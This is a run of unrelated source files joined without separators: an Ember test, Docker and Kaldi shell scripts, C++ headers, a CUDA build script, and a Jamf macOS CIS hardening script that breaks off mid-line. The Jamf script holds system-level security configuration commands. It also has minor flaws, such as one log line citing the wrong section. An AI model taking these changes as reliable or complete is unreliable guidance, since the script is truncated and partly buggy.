<reponame>alisdair/slack-time-zones<gh_stars>10-100 import hbs from 'htmlbars-inline-precompile'; import { moduleForComponent, test } from 'ember-qunit'; import Ember from 'ember'; function shallowText($element) { return $element.contents() .filter((i, e) => e.nodeType === window.Node.TEXT_NODE).text().trim(); } function allTexts(selector, $element) { return $element.find(selector).map(function() { return $(this).text().trim(); }).get(); } function buildUsers(...names) { return Ember.A(names).map(name => { return Ember.Object.create({ name: name.dasherize(), realName: name, image192: 'http://placehold.it/192x192' }); }); } let originalMoment; moduleForComponent('timezone-group', 'Integration - Component - Timezone Group', { integration: true, beforeEach() { originalMoment = window.moment; window.moment = function() { return originalMoment('2015-07-04T22:15:00Z'); }; }, afterEach() { window.moment = originalMoment; } }); test('displays the time and timezone', function(assert) { assert.expect(2); this.set('offset', -9000); this.set('users', []); this.render(hbs` {{timezone-group timezoneOffset=offset users=users}} `); let $group = this.$('.timezone-group'); let $time = $group.find('.timezone-group__time'); assert.equal(shallowText($time), '19:45', 'shows time adjusted for timezone'); let $timezone = $group.find('.timezone-group__timezone'); assert.equal($timezone.text().trim(), '-02:30', 'shows timezone offset'); }); test('lists the users for the timezone, sorted by name', function(assert) { assert.expect(2); this.set('offset', 3600); let users = buildUsers('<NAME>', '<NAME>', '<NAME>'); this.set('users', users); this.render(hbs` {{timezone-group timezoneOffset=offset users=users}} `); let $group = this.$('.timezone-group'); let $profiles = $group.find('.user-profile'); assert.equal($profiles.length, 3, 'renders 3 profiles'); let usernames = allTexts('.user-profile__realname', $profiles); assert.deepEqual(usernames, ['<NAME>', '<NAME>', '<NAME>'], 'sorts users by real name'); });
#!/bin/bash if [ -n "$SUDO_COMMAND" ]; then user=$SUDO_USER uid=$SUDO_UID gid=$SUDO_GID else user=$(whoami) uid=$(id --user) gid=$(id --group) fi label_prefix=local container_name= image=ubuntu:18.04 while [ $# -gt 0 ] do case $1 in --) shift; break; ;; --image) image=$2 shift; shift; ;; --name) container_name=$2 shift; shift; ;; *) echo "Invalid arguments" >&2 exit 1 ;; esac done if [ -n "$container_name" ]; then # find the named container container_id=$(docker ps --quiet --filter name=$container_name) label=$label_prefix.name=$container_name else # find a default container for this user by name container_id=$(docker ps --quiet --filter label=$label_prefix.user=$user) label=$label_prefix.user=$user container_name=${user}_container fi if [ -z "$container_id" ]; then docker run \ --volume /home/$user/workspace:/home/$user/workspace \ --workdir /home/$user \ --label $label \ --restart always \ --name $container_name \ --user $uid:$gid \ --interactive \ --tty \ --detach \ --init \ $image bash container_id=$(docker ps --quiet --filter label=$label) container_ipaddr=$(docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' $container_id) # Custom firewall rules etc. can be setup here for the new container fi if [ -z "$container_id" ]; then echo "Failed to start container" >&2 exit 1 fi # login with no parameters should enter an interactive shell if [ $# -eq 0 ]; then docker exec -it $container_id /bin/bash else # rsync --server requires an interactive shell and no tty if [[ "$@" =~ "rsync --server "* ]]; then docker exec -i $container_id "$@" else docker exec -t $container_id "$@" fi fi
#!/bin/bash # this script is called from scripts like run_ms.sh; it does the common stages # of the build, such as feature extraction. # This is actually the same as local/online/run_nnet2_common.sh, except # for the directory names. . cmd.sh mfccdir=mfcc stage=1 . cmd.sh . ./path.sh . ./utils/parse_options.sh if [ $stage -le 1 ]; then for datadir in train dev eval; do utils/copy_data_dir.sh data/$datadir data/${datadir}_hires steps/make_mfcc.sh --nj 40 --mfcc-config conf/mfcc_hires.conf \ --cmd "$train_cmd" data/${datadir}_hires exp/make_hires/$datadir $mfccdir || exit 1; steps/compute_cmvn_stats.sh data/${datadir}_hires exp/make_hires/$datadir $mfccdir || exit 1; done # Make a subset containing 15% of the original training set utils/subset_data_dir.sh data/train_hires 28300 data/train_15p_hires || exit 1 fi if [ $stage -le 2 ]; then # We need to build a small system just because we need the LDA+MLLT transform # to train the diag-UBM on top of. We align the si84 data for this purpose. steps/align_fmllr.sh --nj 40 --cmd "$train_cmd" \ data/train_40k data/lang_bd exp/tri3 exp/nnet3/tri3_ali_p15 fi if [ $stage -le 3 ]; then # Train a small system just for its LDA+MLLT transform. We use --num-iters 13 # because after we get the transform (12th iter is the last), any further # training is pointless. steps/train_lda_mllt.sh --cmd "$train_cmd" --num-iters 13 \ --realign-iters "" \ --splice-opts "--left-context=3 --right-context=3" \ 5000 10000 data/train_15p_hires data/lang_bd \ exp/nnet3/tri3_ali_p15 exp/nnet3/tri4 fi if [ $stage -le 4 ]; then mkdir -p exp/nnet3 steps/online/nnet2/train_diag_ubm.sh --cmd "$train_cmd" --nj 30 \ --num-frames 400000 data/train_15p_hires 256 exp/nnet3/tri4 exp/nnet3/diag_ubm fi if [ $stage -le 5 ]; then # even though $nj is just 10, each job uses multiple processes and threads. steps/online/nnet2/train_ivector_extractor.sh --cmd "$train_cmd" --nj 10 \ data/train_hires exp/nnet3/diag_ubm exp/nnet3/extractor || exit 1; fi if [ $stage -le 6 ]; then # We extract iVectors on all the train_si284 data, which will be what we # train the system on. # having a larger number of speakers is helpful for generalization, and to # handle per-utterance decoding well (iVector starts at zero). # NOTE! this script is deprecated, please use utils/data/modify_speaker_info.sh steps/online/nnet2/copy_data_dir.sh --utts-per-spk-max 2 data/train_hires \ data/train_hires_max2 steps/online/nnet2/extract_ivectors_online.sh --cmd "$train_cmd" --nj 10 \ data/train_hires_max2 exp/nnet3/extractor exp/nnet3/ivectors_train || exit 1; fi if [ $stage -le 7 ]; then rm exp/nnet3/.error 2>/dev/null for data in dev eval; do steps/online/nnet2/extract_ivectors_online.sh --cmd "$train_cmd" --nj 8 \ data/${data}_hires exp/nnet3/extractor exp/nnet3/ivectors_${data} || touch exp/nnet3/.error & done wait [ -f exp/nnet3/.error ] && echo "$0: error extracting iVectors." && exit 1; fi exit 0;
from typing import List def absolute_differences_sum(arr: List[int]) -> int: abs_diff_sum = 0 for i in range(len(arr) - 1): abs_diff_sum += abs(arr[i] - arr[i+1]) return abs_diff_sum # Test cases print(absolute_differences_sum([4, 1, 7, 3])) # Output: 12 print(absolute_differences_sum([2, 2, 2, 2])) # Output: 0 print(absolute_differences_sum([5, 8, 2, 10, 3])) # Output: 17
#!/bin/bash # # Since running everything at once yields inconsistent result, this script # runs each benchmark one by one. # An optional numeric argument can be used to run multiple iterations. # if [ ! -z $1 ]; then QPB_BENCH_EXTRA_ARG="-iterations $1" fi OUT=$(cd $(dirname ${BASH_SOURCE[0]}) && pwd)/out $OUT/bin/test-protobuf-qml -input $OUT/test/protobuf/tst_benchmark.qml JsonBenchmark::benchmark_json_ctor $QPB_BENCH_EXTRA_ARG $OUT/bin/test-protobuf-qml -input $OUT/test/protobuf/tst_benchmark.qml JsonBenchmark::benchmark_json $QPB_BENCH_EXTRA_ARG $OUT/bin/test-protobuf-qml -input $OUT/test/protobuf/tst_benchmark.qml SerializationBenchmark::benchmark_ctor $QPB_BENCH_EXTRA_ARG $OUT/bin/test-protobuf-qml -input $OUT/test/protobuf/tst_benchmark.qml SerializationBenchmark::benchmark_v4cb $QPB_BENCH_EXTRA_ARG $OUT/bin/test-protobuf-qml -input $OUT/test/protobuf/tst_benchmark.qml SerializationBenchmark::benchmark_v4 $QPB_BENCH_EXTRA_ARG $OUT/bin/test-protobuf-qml -input $OUT/test/protobuf/tst_benchmark.qml SerializationBenchmark::benchmark_lecagy $QPB_BENCH_EXTRA_ARG
#ifndef MUSE_MCL_2D_UPDATE_MODEL_2D_HPP #define MUSE_MCL_2D_UPDATE_MODEL_2D_HPP #include <ros/node_handle.h> #include <cslibs_math_ros/tf/tf_provider.hpp> #include <cslibs_plugins/plugin.hpp> #include <cslibs_plugins_data/data.hpp> #include <muse_mcl_2d/instance/sample_2d.hpp> #include <muse_smc/smc/traits/update_model.hpp> namespace muse_mcl_2d { class UpdateModel2D : public muse_smc::traits::UpdateModel<Hypothesis2D>::type, public cslibs_plugins::Plugin { public: using Ptr = std::shared_ptr<UpdateModel2D>; using data_t = muse_smc::traits::Data<Hypothesis2D>::type; using transform_t = muse_smc::traits::Transform<Hypothesis2D>::type; using state_t = muse_smc::traits::State<Hypothesis2D>::type; using point_t = muse_smc::traits::StateSpaceBoundary<Hypothesis2D>::type; using state_space_t = muse_smc::traits::StateSpace<Hypothesis2D>::type; using sample_set_t = muse_smc::traits::SampleSet<Hypothesis2D>::type; static std::string Type() { return "muse_mcl_2d::UpdateModel2D"; } inline std::size_t getModelId() const override { return cslibs_plugins::Plugin::getId(); } inline std::string const &getName() const override { return cslibs_plugins::Plugin::getName(); } inline void setup(const cslibs_math_ros::tf::TFProvider::Ptr &tf, ros::NodeHandle &nh) { auto param_name = [this](const std::string &name) { return name_ + "/" + name; }; tf_ = tf; world_frame_ = nh.param<std::string>("world_frame", "world"); robot_base_frame_ = nh.param<std::string>("base_frame", "base_link"); tf_timeout_ = ros::Duration(nh.param<double>(param_name("tf_timeout"), 0.1)); doSetup(nh); } protected: cslibs_math_ros::tf::TFProvider::Ptr tf_{nullptr}; ros::Duration tf_timeout_{0.1}; std::string world_frame_; std::string robot_base_frame_; virtual void doSetup(ros::NodeHandle &nh) = 0; }; } // namespace muse_mcl_2d #endif // MUSE_MCL_2D_UPDATE_MODEL_2D_HPP
TF_INC=$(python -c 'import tensorflow as tf; print(tf.sysconfig.get_include())') echo $TF_INC TF_LIB=$(python -c 'import tensorflow as tf; print(tf.sysconfig.get_lib())') CUDA_PATH=/usr/local/cuda cd hough_voting_gpu_layer nvcc -std=c++11 -c -o hough_voting_gpu_op.cu.o hough_voting_gpu_op.cu.cc \ -I $TF_INC -I$TF_INC/external/nsync/public -D GOOGLE_CUDA=1 -x cu -Xcompiler -fPIC -arch=sm_50 g++ -std=c++11 -shared -o hough_voting_gpu.so hough_voting_gpu_op.cc \ hough_voting_gpu_op.cu.o -I $TF_INC -I$TF_INC/external/nsync/public -fPIC -L/usr/local/lib -lcudart -lcublas -lopencv_imgproc -lopencv_calib3d -lopencv_core -L $CUDA_PATH/lib64 -L$TF_LIB -ltensorflow_framework -Wl,-z,defs cd .. echo 'hough_voting_gpu_layer'
<reponame>rovedit/Fort-Candle<filename>src/systems/ParticleSystem.hh #pragma once #include <glow/fwd.hh> #include "advanced/World.hh" #include "ecs/Engine.hh" #include "ecs/System.hh" #include "types/Particle.hh" namespace gamedev { // Inspired by https://github.com/TheCherno/OneHourParticleSystem class ParticleSystem : public System { public: void Init(SharedEngineECS& ecs); void AddEntity(InstanceHandle& handle, Signature entitySignature); void SetupParticleCount(int particleCount); void UploadParticleData(); glow::SharedVertexArray& GetParticleVAO(); int Update(float elapsed_time); void RenderInstanced(const glow::UsedProgram& shader, const glow::SharedFramebuffer& framebuffer); void EmitParticle(const ParticleProperties& particleProperties, transform& xform); void KillParticle(int id); long int GetParticleCount(); private: void Init_MonsterDeathParticles(); void Init_PioneerDeathParticles(); void Init_BuildingDestroyedParticles(); private: void ParticleListener(Event& e); private: std::shared_ptr<EngineECS> mECS; std::vector<Particle> mParticlePool; std::vector<ParticleAttributes> mParticleAttributes; glow::SharedVertexArray mVaoCube; glow::SharedArrayBuffer mVboParticles; private: int mFreeIndex = 0; int mAlive = 0; int MAX_PARTICLES = 100000; int INSTANCE_DATA_LENGTH = 17; // 4 * 4 + 1 ParticleProperties mMonsterDeath; ParticleProperties mPioneerDeath; ParticleProperties mBuildingDestroyed; }; /* class GPUParticleSystem : public System { public: void Init(SharedEngineECS& ecs); void AddEntity(InstanceHandle& handle, Signature entitySignature); void EmitParticle(const ParticleProperties& particleProperties, transform& xform); void KillParticle(int id); void AllocateParticleBuffer(std::uint64_t particles); void UpdateParticleBuffer(); void ComputeParticles(); void RenderParticles(glow::UsedProgram& shader); void Update(float elapsed_time); private: std::shared_ptr<EngineECS> mECS; std::vector<Particle> mParticlePool; std::vector<ParticleAttributes> mParticleAttributes; glow::SharedVertexArray mVaoParticle; glow::SharedArrayBuffer mVboParticleData; glow::SharedShaderStorageBuffer mSsboParticleData; glow::SharedShaderStorageBuffer mSsboDeadParticles; glow::SharedShaderStorageBuffer mSsboAliveParticles1; glow::SharedShaderStorageBuffer mSsboAliveParticles2; glow::SharedProgram mProgramComputeParticles; private: long unsigned int mFreeIndex = 0; long unsigned int mAlive = 0; long unsigned int mMaxGenParticles = 100000; long unsigned int mParticleBufferSize = 0; int PARTICLE_DATA_LENGTH = int INSTANCE_DATA_LENGTH = 17; // 4 * 4 + 1 }; */ }
#!/bin/bash #################################################################################################### # # Copyright (c) 2017, Jamf, LLC. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the JAMF Software, LLC nor the # names of its contributors may be used to endorse or promote products # derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY JAMF SOFTWARE, LLC "AS IS" AND ANY # EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL JAMF SOFTWARE, LLC BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # #################################################################################################### # written by Katie English, Jamf October 2016 # updated for 10.12 CIS benchmarks by Katie English, Jamf February 2017 # updated to use configuration profiles by Apple Professional Services, January 2018 # github.com/jamfprofessionalservices # updated for 10.13 CIS benchmarks by Erin McDonald, Jamf Jan 2019 # updated for 10.15 CIS benchmarks by Erin McDonald, Jamf 2020 # USAGE # Reads from plist at /Library/Application Support/SecurityScoring/org_security_score.plist by default. # For "true" items, runs query for current computer/user compliance. # Non-compliant items are logged to /Library/Application Support/SecurityScoring/org_audit plistlocation="/Library/Application Support/SecurityScoring/org_security_score.plist" currentUser="$(python -c 'from SystemConfiguration import SCDynamicStoreCopyConsoleUser; import sys; username = (SCDynamicStoreCopyConsoleUser(None, None, None) or [None])[0]; username = [username,""][username in [u"loginwindow", None, u""]]; sys.stdout.write(username + "\n");')" currentUserID="$(/usr/bin/id -u $currentUser)" hardwareUUID="$(/usr/sbin/system_profiler SPHardwareDataType | grep "Hardware UUID" | awk -F ": " '{print $2}' | xargs)" logFile="/Library/Application Support/SecurityScoring/remediation.log" # Append to existing logFile echo "$(date -u)" "Beginning remediation" >> "$logFile" # Create new logFile # echo "$(date -u)" "Beginning remediation" > "$logFile" if [[ ! -e $plistlocation ]]; then echo "No scoring file present" exit 0 fi # 1.1 Verify all Apple provided software is current # Verify organizational score Audit1_1="$(defaults read "$plistlocation" OrgScore1_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit1_1" = "1" ]; then echo "$(date -u)" "1.1 remediated" | tee -a "$logFile" # NOTE: INSTALLS ALL RECOMMENDED SOFTWARE UPDATES FROM CLIENT'S CONFIGURED SUS SERVER softwareupdate -i -r fi # 1.2 Enable Auto Update # Verify organizational score Audit1_2="$(defaults read "$plistlocation" OrgScore1_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit1_2" = "1" ]; then defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticCheckEnabled -int 1 echo "$(date -u)" "1.2 remediated" | tee -a "$logFile" fi # 1.3 Enable Download new updates when available # Verify organizational score Audit1_3="$(defaults read "$plistlocation" OrgScore1_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit1_3" = "1" ]; then defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticDownload -int 1 echo "$(date -u)" "1.3 remediated" | tee -a "$logFile" fi # 1.4 Enable app update installs # Verify organizational score Audit1_4="$(defaults read "$plistlocation" OrgScore1_4)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit1_4" = "1" ]; then defaults write /Library/Preferences/com.apple.commerce AutoUpdate -bool true echo "$(date -u)" "1.4 remediated" | tee -a "$logFile" fi # 1.5 Enable system data files and security update installs # Verify organizational score Audit1_5="$(defaults read "$plistlocation" OrgScore1_5)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit1_5" = "1" ]; then defaults write /Library/Preferences/com.apple.SoftwareUpdate ConfigDataInstall -bool true defaults write /Library/Preferences/com.apple.SoftwareUpdate CriticalUpdateInstall -bool true echo "$(date -u)" "1.5 remediated" | tee -a "$logFile" fi # 1.6 Enable macOS update installs # Verify organizational score Audit1_6="$(defaults read "$plistlocation" OrgScore1_6)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit1_6" = "1" ]; then defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticallyInstallMacOSUpdates -bool true echo "$(date -u)" "1.6 remediated" | tee -a "$logFile" fi # 2.1.1 Turn off Bluetooth, if no paired devices exist # Verify organizational score Audit2_1_1="$(defaults read "$plistlocation" OrgScore2_1_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_1_1" = "1" ]; then echo "$(date -u)" "Checking 2.1.1" | tee -a "$logFile" connectable="$( system_profiler SPBluetoothDataType | grep Paired | awk '{print $2}' | head -1 )" if [ "$connectable" = "Yes" ]; then echo "$(date -u)" "2.1.1 passed" | tee -a "$logFile"; else defaults write /Library/Preferences/com.apple.Bluetooth ControllerPowerState -bool false killall -HUP blued echo "$(date -u)" "2.1.1 remediated" | tee -a "$logFile" fi fi # 2.1.3 Show Bluetooth status in menu bar # Verify organizational score Audit2_1_3="$(defaults read "$plistlocation" OrgScore2_1_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_1_3" = "1" ]; then open "/System/Library/CoreServices/Menu Extras/Bluetooth.menu" echo "$(date -u)" "2.1.3 remediated" | tee -a "$logFile" fi ## 2.2.1 Enable "Set time and date automatically" (Not Scored) # Verify organizational score Audit2_2_1="$(defaults read "$plistlocation" OrgScore2_2_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_2_1" = "1" ]; then systemsetup -setusingnetworktime on echo "$(date -u)" "2.4.1 remediated" | tee -a "$logFile" fi # 2.2.2 Ensure time set is within appropriate limits # Not audited - only enforced if identified as priority # Verify organizational score Audit2_2_2="$(defaults read "$plistlocation" OrgScore2_2_2)" # If organizational score is 1 or true, check status of client if [ "$Audit2_2_2" = "1" ]; then systemsetup -setusingnetworktime off systemsetup -setusingnetworktime on # timeServer="$(systemsetup -getnetworktimeserver | awk '{print $4}')" # ntpdate -sv "$timeServer" echo "$(date -u)" "2.2.2 enforced" | tee -a "$logFile" fi # 2.3.1 Set an inactivity interval of 20 minutes or less for the screen saver # Verify organizational score Audit2_3_1="$(defaults read "$plistlocation" OrgScore2_3_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_3_1" = "1" ]; then defaults write /Users/"$currentUser"/Library/Preferences/ByHost/com.apple.screensaver."$hardwareUUID".plist idleTime -int 1200 echo "$(date -u)" "2.3.1 remediated" | tee -a "$logFile" fi # 2.3.2 Secure screen saver corners # Verify organizational score Audit2_3_2="$(defaults read "$plistlocation" OrgScore2_3_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_3_2" = "1" ]; then bl_corner="$(defaults read /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-bl-corner)" tl_corner="$(defaults read /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-tl-corner)" tr_corner="$(defaults read /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-tr-corner)" br_corner="$(defaults read /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-br-corner)" if [ "$bl_corner" = "6" ]; then echo "Disabling hot corner" defaults write /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-bl-corner 1 /usr/bin/killall Dock echo "$(date -u)" "2.3.2 remediated" | tee -a "$logFile" fi if [ "$tl_corner" = "6" ]; then echo "Disabling hot corner" defaults write /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-tl-corner 1 /usr/bin/killall Dock echo "$(date -u)" "2.3.2 remediated" | tee -a "$logFile" fi if [ "$tr_corner" = "6" ]; then echo "Disabling hot corner" defaults write /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-tr-corner 1 /usr/bin/killall Dock echo "$(date -u)" "2.3.2 remediated" | tee -a "$logFile" fi if [ "$br_corner" = "6" ]; then echo "Disabling hot corner" defaults write /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-br-corner 1 /usr/bin/killall Dock echo "$(date -u)" "2.3.2 remediated" | tee -a "$logFile" fi fi # 2.3.3 Familiarize users with screen lock tools or corner to Start Screen Saver # Verify organizational score Audit2_3_3="$(defaults read "$plistlocation" OrgScore2_3_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate # Sets bottom left corner to start screen saver if [ "$Audit2_3_3" = "1" ]; then defaults write /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-bl-corner 5 echo "$(date -u)" "2.3.3 remediated" | tee -a "$logFile" fi # 2.4.1 Disable Remote Apple Events # Requires Full Disk Access privileges # Verify organizational score Audit2_4_1="$(defaults read "$plistlocation" OrgScore2_4_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_1" = "1" ]; then systemsetup -setremoteappleevents off echo "$(date -u)" "2.4.1 remediated" | tee -a "$logFile" fi # 2.4.2 Disable Internet Sharing # Verify organizational score Audit2_4_2="$(defaults read "$plistlocation" OrgScore2_4_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_2" = "1" ]; then /usr/libexec/PlistBuddy -c "Delete :NAT:AirPort:Enabled" /Library/Preferences/SystemConfiguration/com.apple.nat.plist /usr/libexec/PlistBuddy -c "Add :NAT:AirPort:Enabled bool false" /Library/Preferences/SystemConfiguration/com.apple.nat.plist /usr/libexec/PlistBuddy -c "Delete :NAT:Enabled" /Library/Preferences/SystemConfiguration/com.apple.nat.plist /usr/libexec/PlistBuddy -c "Add :NAT:Enabled bool false" /Library/Preferences/SystemConfiguration/com.apple.nat.plist /usr/libexec/PlistBuddy -c "Delete :NAT:PrimaryInterface:Enabled" /Library/Preferences/SystemConfiguration/com.apple.nat.plist /usr/libexec/PlistBuddy -c "Add :NAT:PrimaryInterface:Enabled bool false" /Library/Preferences/SystemConfiguration/com.apple.nat.plist echo "$(date -u)" "2.4.2 enforced" | tee -a "$logFile" fi # 2.4.3 Disable Screen Sharing # Verify organizational score Audit2_4_3="$(defaults read "$plistlocation" OrgScore2_4_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_3" = "1" ]; then launchctl unload -w /System/Library/LaunchDaemons/com.apple.screensharing.plist /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate -stop echo "$(date -u)" "2.4.3 remediated" | tee -a "$logFile" fi # 2.4.4 Disable Printer Sharing # Verify organizational score Audit2_4_4="$(defaults read "$plistlocation" OrgScore2_4_4)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_4" = "1" ]; then /usr/sbin/cupsctl --no-share-printers while read -r _ _ printer _; do /usr/sbin/lpadmin -p "${printer/:}" -o printer-is-shared=false done < <(/usr/bin/lpstat -v) echo "$(date -u)" "2.4.4 remediated" | tee -a "$logFile" fi # 2.4.5 Disable Remote Login # Requires full disk access # Verify organizational score Audit2_4_5="$(defaults read "$plistlocation" OrgScore2_4_5)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_5" = "1" ]; then /usr/sbin/systemsetup -f -setremotelogin off echo "$(date -u)" "2.4.5 remediated" | tee -a "$logFile" fi # 2.4.6 Disable DVD or CD Sharing # Verify organizational score Audit2_4_6="$(defaults read "$plistlocation" OrgScore2_4_6)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_6" = "1" ]; then launchctl unload -w /System/Library/LaunchDaemons/com.apple.ODSAgent.plist echo "$(date -u)" "2.4.6 remediated" | tee -a "$logFile" fi # 2.4.7 Disable Bluetooth Sharing # Verify organizational score Audit2_4_7="$(defaults read "$plistlocation" OrgScore2_4_7)" # If organizational score is 1 or true, check status of client and user # If client fails, then remediate if [ "$Audit2_4_7" = "1" ]; then /usr/libexec/PlistBuddy -c "Delete :PrefKeyServicesEnabled" /Users/"$currentUser"/Library/Preferences/ByHost/com.apple.Bluetooth."$hardwareUUID".plist /usr/libexec/PlistBuddy -c "Add :PrefKeyServicesEnabled bool false" /Users/"$currentUser"/Library/Preferences/ByHost/com.apple.Bluetooth."$hardwareUUID".plist echo "$(date -u)" "2.4.7 remediated" | tee -a "$logFile" fi # 2.4.8 Disable File Sharing # Verify organizational score Audit2_4_8="$(defaults read "$plistlocation" OrgScore2_4_8)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_8" = "1" ]; then launchctl unload -w /System/Library/LaunchDaemons/com.apple.AppleFileServer.plist launchctl unload -w /System/Library/LaunchDaemons/com.apple.smbd.plist echo "$(date -u)" "2.4.8 remediated" | tee -a "$logFile" fi # 2.4.9 Disable Remote Management # Verify organizational score Audit2_4_9="$(defaults read "$plistlocation" OrgScore2_4_9)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_9" = "1" ]; then launchctl unload -w /System/Library/LaunchDaemons/com.apple.screensharing.plist /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate -stop echo "$(date -u)" "2.4.9 remediated" | tee -a "$logFile" fi #2.4.10 Disable Content Caching # Verify organizational score Audit2_4_10="$(defaults read "$plistlocation" OrgScore2_4_10)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_10" = "1" ]; then /usr/bin/AssetCacheManagerUtil deactivate echo "$(date -u)" "2.4.10 remediated" | tee -a "$logFile" fi #2.4.11 Disable Media Sharing # Verify organizational score Audit2_4_11="$(defaults read "$plistlocation" OrgScore2_4_11)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_11" = "1" ]; then launchctl unload -w /System/Library/LaunchAgents/com.apple.amp.mediasharingd.plist launchctl disable gui/"$currentUserID"/com.apple.amp.mediasharingd /usr/bin/defaults write /Users/"$currentUser"/Library/Preferences/com.apple.amp.mediasharingd.plist home-sharing-enabled -int 0 /usr/bin/defaults write /Users/"$currentUser"/Library/Preferences/com.apple.amp.mediasharingd.plist public-sharing-enabled -int 0 launchctl kill 9 gui/"$currentUserID"/com.apple.amp.mediasharingd echo "$(date -u)" "2.4.11 remediated - requires restart" | tee -a "$logFile" fi # 2.5.2 Enable Gatekeeper # Verify organizational score Audit2_5_2="$(defaults read "$plistlocation" OrgScore2_5_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_5_2" = "1" ]; then spctl --master-enable echo "$(date -u)" "2.5.2 remediated" | tee -a "$logFile" fi # 2.5.3 Enable Firewall # Remediation sets Firewall on for essential services # Verify organizational score Audit2_5_3="$(defaults read "$plistlocation" OrgScore2_5_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_5_3" = "1" ]; then defaults write /Library/Preferences/com.apple.alf globalstate -int 2 echo "$(date -u)" "2.5.3 remediated" | tee -a "$logFile" fi # 2.5.4 Enable Firewall Stealth Mode # Verify organizational score Audit2_5_4="$(defaults read "$plistlocation" OrgScore2_5_4)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_5_4" = "1" ]; then /usr/libexec/ApplicationFirewall/socketfilterfw --setstealthmode on echo "$(date -u)" "2.5.4 remediated" | tee -a "$logFile" fi # 2.5.5 Review Application Firewall Rules # Verify organizational score Audit2_5_5="$(defaults read "$plistlocation" OrgScore2_5_5)" # If organizational score is 1 or true, check status of client # If client fails, then alert to need of remediation if [ "$Audit2_5_5" = "1" ]; then echo "$(date -u)" "2.5.5 not remediated" | tee -a "$logFile" fi # 2.5.6 Enable Location Services # 2.5.8 Disable sending diagnostic and usage data to Apple # Verify Organizational score Audit2_5_8="$(defaults read "$plistlocation" OrgScore2_5_8)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_5_8" = "1" ]; then AppleDiagn=$(defaults read /Library/Application\ Support/CrashReporter/DiagnosticMessagesHistory.plist AutoSubmit) if [ $AppleDiagn == 1 ]; then defaults write /Library/Application\ Support/CrashReporter/DiagnosticMessagesHistory.plist AutoSubmit -int 0 echo "$(date -u)" "2.5.8 remediated" | tee -a "$logFile" fi fi # 2.5.9 Force Limited Ad Tracking # defaults write /Users/"$currentUser"/Library/Preferences/com.apple.Terminal SecureKeyboardEntry -bool true ? # 2.7.1 Time Machine Auto-Backup # Verify organizational score Audit2_7_1="$(defaults read "$plistlocation" OrgScore2_7_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_7_1" = "1" ]; then defaults write /Library/Preferences/com.apple.TimeMachine.plist AutoBackup 1 echo "$(date -u)" "2.7.1 remediated" | tee -a "$logFile" fi # 2.8 Pair the remote control infrared receiver if enabled # Verify organizational score Audit2_8="$(defaults read "$plistlocation" OrgScore2_8)" # If organizational score is 1 or true, check status of 